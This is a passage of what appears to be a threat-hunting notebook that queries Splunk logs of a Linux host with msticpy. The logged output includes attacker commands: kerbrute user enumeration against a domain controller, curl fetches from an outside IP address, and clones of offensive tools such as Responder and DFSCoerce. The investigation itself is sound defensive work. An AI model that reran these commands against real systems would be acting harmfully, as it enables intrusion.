1,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:11794,1683924144,"{""@timestamp"":""2023-04-29T22:37:33.864Z"",""agent"":{""ephemeral_id"":""fa212351-5713-49b4-8a54-651130c40eb3"",""id"":""6cb12c8d-5f82-4045-ad01-b39039886fd5"",""name"":""ip-172-16-40-100"",""type"":""filebeat"",""version"":""8.7.0""},""log"":{""file"":{""path"":""/var/log/syslog""},""offset"":148474548},""message"":""Apr 29 22:37:32 ip-172-16-40-100 teleport[112836]: 2023-04-29T22:37:32Z WARN [NODE:1] Restart watch on error: connection error: desc = \""transport: Error while dialing failed to dial: context deadline exceeded\...",1,"[ip-172-16-22-20, linux]",filebeat,.864,2023-04-29T22:37:33.864+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20
2,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:125210,1683924148,"{""@timestamp"":""2023-04-29T22:37:32.751Z"",""systemd"":{""unit"":""teleport.service"",""invocation_id"":""5417a8fb90974819b7d3e0aef8917700"",""slice"":""system.slice"",""transport"":""stdout"",""cgroup"":""/system.slice/teleport.service""},""user"":{""id"":""0"",""group"":{""id"":""0""}},""input"":{""type"":""journald""},""agent"":{""name"":""ip-172-16-40-100"",""type"":""filebeat"",""version"":""8.7.0"",""ephemeral_id"":""fa212351-5713-49b4-8a54-651130c40eb3"",""id"":""6cb12c8d-5f82-4045-ad01-b39039886fd5""},""message"":""2023-04-29T22:37:32Z WARN [NODE:1]...",2,"[ip-172-16-22-20, linux]",filebeat,.751,2023-04-29T22:37:32.751+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20
3,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:11835,1683924144,"{""@timestamp"":""2023-04-29T22:37:32.751Z"",""systemd"":{""unit"":""teleport.service"",""invocation_id"":""5417a8fb90974819b7d3e0aef8917700"",""slice"":""system.slice"",""transport"":""stdout"",""cgroup"":""/system.slice/teleport.service""},""user"":{""id"":""0"",""group"":{""id"":""0""}},""input"":{""type"":""journald""},""agent"":{""name"":""ip-172-16-40-100"",""type"":""filebeat"",""version"":""8.7.0"",""ephemeral_id"":""fa212351-5713-49b4-8a54-651130c40eb3"",""id"":""6cb12c8d-5f82-4045-ad01-b39039886fd5""},""message"":""2023-04-29T22:37:32Z WARN [NODE:1]...",3,"[ip-172-16-22-20, linux]",filebeat,.751,2023-04-29T22:37:32.751+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20
4,linux~18~BEE3FED0-1943-432F-A851-D74F85B46362,18:124212,1683924148,"{""@timestamp"":""2023-04-29T22:36:30.853Z"",""log"":{""offset"":148470194,""file"":{""path"":""/var/log/syslog""}},""message"":""Apr 29 22:36:30 ip-172-16-40-100 teleport[112836]: 2023-04-29T22:36:30Z WARN [PROC:1] Sync rotation state cycle failed. Retrying in ~10s pid:112836.1 service/connect.go:709"",""input"":{""type"":""log""},""agent"":{""name"":""ip-172-16-40-100"",""type"":""filebeat"",""version"":""8.7.0"",""ephemeral_id"":""fa212351-5713-49b4-8a54-651130c40eb3"",""id"":""6cb12c8d-5f82-4045-ad01-b39039886fd5""},""ecs"":{""versi...",4,"[ip-172-16-22-20, linux]",filebeat,.853,2023-04-29T22:36:30.853+00:00,ip-172-16-40-100,ip-172-16-40-100,linux,1,linux,filebeat,ip-172-16-22-20


### Process activities

In [26]:
splunk_query = f'''search index=sysmonforlinux {query_common_args}
| stats count by RuleName,User,Image,CommandLine,ParentCommandLine'''
df_process = splunk_prov.exec_query(splunk_query)
df_process.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 97.10it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,RuleName,User,Image,CommandLine,ParentCommandLine,count
0,-,-,/root/tools/kerbrute,./kerbrute userenum -d magnumtempus.financial --dc dc.magnumtempus.financial /root/d,-,64
1,-,-,/snap/snapd/18933/usr/bin/snap,/usr/bin/snap advise-snap --format=json --command crackmapexec,/usr/bin/python3,64
2,-,-,/snap/snapd/18933/usr/bin/snap,/usr/bin/snap advise-snap --from-apt,/bin/sh,256
3,-,-,/usr/bin/apt-config,apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring,/bin/sh,704
4,-,-,/usr/bin/apt-config,apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI,/bin/sh,704
5,-,-,/usr/bin/apt-config,apt-config shell DpkgStatus Dir::State::status,/bin/sh,128
6,-,-,/usr/bin/apt-config,apt-config shell EtcDir Dir::Etc,/bin/sh,128
7,-,-,/usr/bin/apt-config,apt-config shell GPGV Apt::Key::gpgvcommand,/bin/sh,704
8,-,-,/usr/bin/apt-config,apt-config shell ListDir Dir::State::Lists,/bin/sh,128
9,-,-,/usr/bin/apt-config,apt-config shell MASTER_KEYRING APT::Key::MasterKeyring,/bin/sh,704


In [27]:
splunk_query = f'''search index=sysmonforlinux {query_common_args} (kebrute OR crackmapexec OR curl OR wget OR pip3 OR git)
| stats count by RuleName,User,Image,CommandLine,ParentCommandLine'''
df_process2 = splunk_prov.exec_query(splunk_query)
df_process2.head(20)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 96.84it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


,RuleName,User,Image,CommandLine,ParentCommandLine,count
0,-,-,/snap/snapd/18933/usr/bin/snap,/usr/bin/snap advise-snap --format=json --command crackmapexec,/usr/bin/python3,64
1,-,-,/usr/bin/curl,curl http://18.220.210.56:1935/b,bash,128
2,-,-,/usr/bin/curl,curl http://18.220.210.56:1935/c,bash,64
3,-,-,/usr/bin/curl,curl http://18.220.210.56:1935/d,bash,64
4,-,-,/usr/bin/dpkg,dpkg -l wget,-,64
5,-,-,/usr/bin/dpkg-query,dpkg-query --list -- wget,-,64
6,-,-,/usr/bin/git,git branch,/usr/bin/python3,96
7,-,-,/usr/bin/git,git clone https://github.com/Wh04m1001/DFSCoerce,-,64
8,-,-,/usr/bin/git,git clone https://github.com/lgandx/Responder,-,64
9,-,-,/usr/bin/git,git rev-parse HEAD,/usr/bin/python3,32


In [28]:
splunk_query = f'''search index=sysmonforlinux {query_common_args} (kebrute OR crackmapexec OR curl OR wget OR pip3 OR git OR 11317)
| stats count by host,RuleName,UtcTime,User,Image,ProcessId,CommandLine,ParentProcessId,ParentCommandLine'''
df_process_tree = splunk_prov.exec_query(splunk_query)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 96.03it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


In [29]:
df_process_tree.head(5)

,host,RuleName,UtcTime,User,Image,ProcessId,CommandLine,ParentProcessId,ParentCommandLine,count
0,ip-172-16-40-100,-,2023-04-29 17:53:35.074,-,/usr/bin/dpkg,110493,dpkg -l wget,110492,-,512
1,ip-172-16-40-100,-,2023-04-29 17:53:35.074,-,/usr/bin/dpkg-query,110493,dpkg-query --list -- wget,110492,-,512
2,ip-172-16-40-100,-,2023-04-29 17:53:35.542,-,/usr/bin/wget,110511,wget --timeout 60 -U wget/1.21.2-2ubuntu1 Ubuntu/22.04.1/LTS GNU/Linux/5.15.0-1028-aws/x86_64 Intel(R)/Xeon(R)/Platinum/8259CL/CPU/@/2.50GHz cloud_id/aws -O- --content-on-error https://motd.ubuntu.com,110488,/bin/sh,256
3,ip-172-16-40-100,-,2023-04-29 19:59:29.656,-,/usr/bin/curl,111340,curl http://18.220.210.56:1935/b,111317,bash,512
4,ip-172-16-40-100,-,2023-04-29 19:59:58.504,-,/usr/bin/curl,111343,curl http://18.220.210.56:1935/b,111317,bash,512


In [30]:
df_process_tree[df_process_tree['ProcessId'] == 11317]

,host,RuleName,UtcTime,User,Image,ProcessId,CommandLine,ParentProcessId,ParentCommandLine,count


In [31]:
# Process tree
from msticpy.transform.proc_tree_builder import LX_EVENT_SCH
from copy import copy
cust_lx_schema = copy(LX_EVENT_SCH)

cust_lx_schema.time_stamp = "UtcTime"
cust_lx_schema.host_name_column = "host"
cust_lx_schema.cmd_line = "CommandLine"
cust_lx_schema.process_name = "Image"
cust_lx_schema.process_id = "ProcessId"
cust_lx_schema.parent_id = "ParentProcessId"
cust_lx_schema.user_name = "User"
cust_lx_schema.event_id_column = None
cust_lx_schema.event_id_identifier = None

# now supply the schema as the schema parameter
#process_tree.build_process_tree(df_process_tree, schema=cust_lx_schema)
df_process_tree.mp_plot.process_tree(schema=cust_lx_schema)

/usr/local/lib/python3.10/dist-packages/bokeh/io/notebook.py:487: DeprecationWarning: The `source` parameter emit a  deprecation warning since IPython 8.0, it had no effects for a long time and will  be removed in future versions.
  publish_display_data(data, metadata, source, transient=transient, **kwargs)


Loading BokehJS ...

/usr/local/lib/python3.10/dist-packages/bokeh/io/notebook.py:487: DeprecationWarning: The `source` parameter emit a  deprecation warning since IPython 8.0, it had no effects for a long time and will  be removed in future versions.
  publish_display_data(data, metadata, source, transient=transient, **kwargs)


(Figure(id='1036', ...), Row(id='1175', ...))

In [32]:
splunk_query = f'''search index=osquery pack_osquery-custom-pack_processes {query_common_args}
| spath input=message
| where name="pack_osquery-custom-pack_outbound_connections"
| stats count by name,action,columns.pid,columns.cmdline,columns.ppid,columns.pcmdline'''
df_process9 = splunk_prov.exec_query(splunk_query)
if not df_process9 or df_process9.empty:
    print("No results")
else:
    df_process9.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 97.00it/s]

Warning - query did not return any results.
No results



/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


### Network activities

In [33]:
splunk_query = f'''search index=osquery pack_osquery-custom-pack_dns_resolvers {query_common_args}
| spath input=message
| where name="pack_osquery-custom-pack_dns_resolvers"
| stats count by name,action,columns.address,columns.type'''
df_dns = splunk_prov.exec_query(splunk_query)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 94.61it/s]
/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


In [34]:
 df_dns.head(10)

,name,action,columns.address,columns.type,count
0,pack_osquery-custom-pack_dns_resolvers,removed,127.0.0.53,nameserver,1
1,pack_osquery-custom-pack_dns_resolvers,removed,172.16.50.100,nameserver,1


In [35]:
splunk_query = f'''search index=osquery pack_osquery-custom-pack_outbound_connections {query_common_args}
| spath input=message
| where name="pack_osquery-custom-pack_outbound_connections"
| stats count by name,action,columns.username,columns.name,columns.path,columns.cmdline,columns.remote_address'''
df_outbound = splunk_prov.exec_query(splunk_query)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 94.88it/s]

Warning - query did not return any results.



/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


In [36]:
if not df_outbound or df_outbound.empty:
    print("No results")
else:
    df_outbound.head(10)

No results


### File Integrity Monitoring

In [37]:
splunk_query = f'''search index=osquery fim {query_common_args}
| spath input=message
| where name="fim"
| stats count by name,columns.target_path,columns.action'''
df_fim = splunk_prov.exec_query(splunk_query)
if not df_fim or df_fim.empty:
    print("No results")
else:
    df_fim.head(10)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 96.43it/s]

Warning - query did not return any results.
No results



/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


### Misc

In [38]:
splunk_prov.list_queries()

['Alerts.list_alerts',
 'Alerts.list_alerts_for_dest_ip',
 'Alerts.list_alerts_for_src_ip',
 'Alerts.list_alerts_for_user',
 'Alerts.list_all_alerts',
 'Authentication.list_logon_failures',
 'Authentication.list_logons_for_account',
 'Authentication.list_logons_for_host',
 'Authentication.list_logons_for_source_ip',
 'SplunkGeneral.get_events_parameterized',
 'SplunkGeneral.list_all_datatypes',
 'SplunkGeneral.list_all_savedsearches',
 'audittrail.list_all_audittrail']

In [39]:
splunk_query = f'''search index=osquery pack_osquery-custom-pack_python_packages {query_common_args}
| search name="pack_osquery-custom-pack_python_packages"
| stats count by name,action,columns.name,columns.summary,columns.version'''
df_python = splunk_prov.exec_query(splunk_query)

Waiting Splunk job to complete: 100%|██████████| 100.0/100 [00:01<00:00, 95.62it/s]

Warning - query did not return any results.



/usr/local/lib/python3.10/dist-packages/msticpy/data/drivers/splunk_driver.py:234: DeprecationWarning: ResultsReader is a deprecated function. Use the JSONResultsReader function instead in conjuction with the 'output_mode' query param set to 'json'
  reader = sp_results.ResultsReader(query_job.results())


In [40]:
if not df_python or df_python.empty:
    print("No results")
else:
    df_python.head(10)

No results
